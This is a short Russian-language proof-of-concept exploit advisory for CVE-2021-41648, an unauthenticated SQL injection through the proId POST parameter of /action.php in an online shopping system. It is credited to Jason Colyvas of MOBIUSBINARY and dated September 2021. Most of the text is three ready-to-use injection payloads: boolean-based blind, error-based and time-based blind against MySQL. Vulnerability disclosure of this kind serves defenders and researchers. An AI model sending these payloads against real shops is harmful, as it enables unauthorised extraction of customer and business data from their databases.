
Эксплойт, подтверждающий концепцию, для неаутентифицированной SQL-инъекции в online-shopping-system через параметр proId, позволяющий извлекать данные из базы данных MySQL.
CVE-2021-41648 SQL-инъекция в онлайн-системе покупок
Система онлайн-покупок уязвима для неаутентифицированных ошибок/логических слепых и основанных на ошибках SQL-инъекций.
Параметр proId на странице /action.php не санирует пользовательский ввод, что позволяет злоумышленнику извлекать конфиденциальные данные из нижележащей базы данных MySQL.
URL: /action.php
ПАРАМЕТР: proId
Параметр: proId (POST)
Тип: логическая слепая
Название: OR логическая слепая - предложение WHERE или HAVING (NOT - комментарий MySQL)
Полезная нагрузка: proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1
Тип: основанный на ошибках
Название: MySQL >= 5.0 OR основанный на ошибках - предложение WHERE, HAVING, ORDER BY или GROUP BY (FLOOR)
Полезная нагрузка: proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1
Тип: временная слепая
Название: MySQL >= 5.0.12 AND временная слепая (запрос SLEEP)
Полезная нагрузка: proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1

Jason Colyvas
MOBIUSBINARY
21 сентября 2021 г.